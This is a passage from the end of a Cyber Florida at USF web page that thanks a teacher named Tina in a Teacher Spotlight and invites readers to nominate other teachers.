Her commitment to cybersecurity education and student success is truly commendable. Thank you, Tina, for your invaluable contributions!

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

2024-10-25T14:38:49-04:00October 25, 2024|
Read More

CONTACT US

Cyber Florida at USF
4202 E. Fowler Avenue, ISA7020
Tampa, FL 33620

Office meetings by appointment only

PRIVACY POLICY

Copyright 2024 The Florida Center for Cybersecurity at the University of South Florida. Information on this website is made available for general educational purposes only and should not be used in lieu of obtaining competent legal advice from a licensed attorney or cybersecurity professional with sufficient expertise necessary to address your specific needs. Use of this website does not create any special or fiduciary relationship between you and the Florida Center for Cybersecurity or the University of South Florida.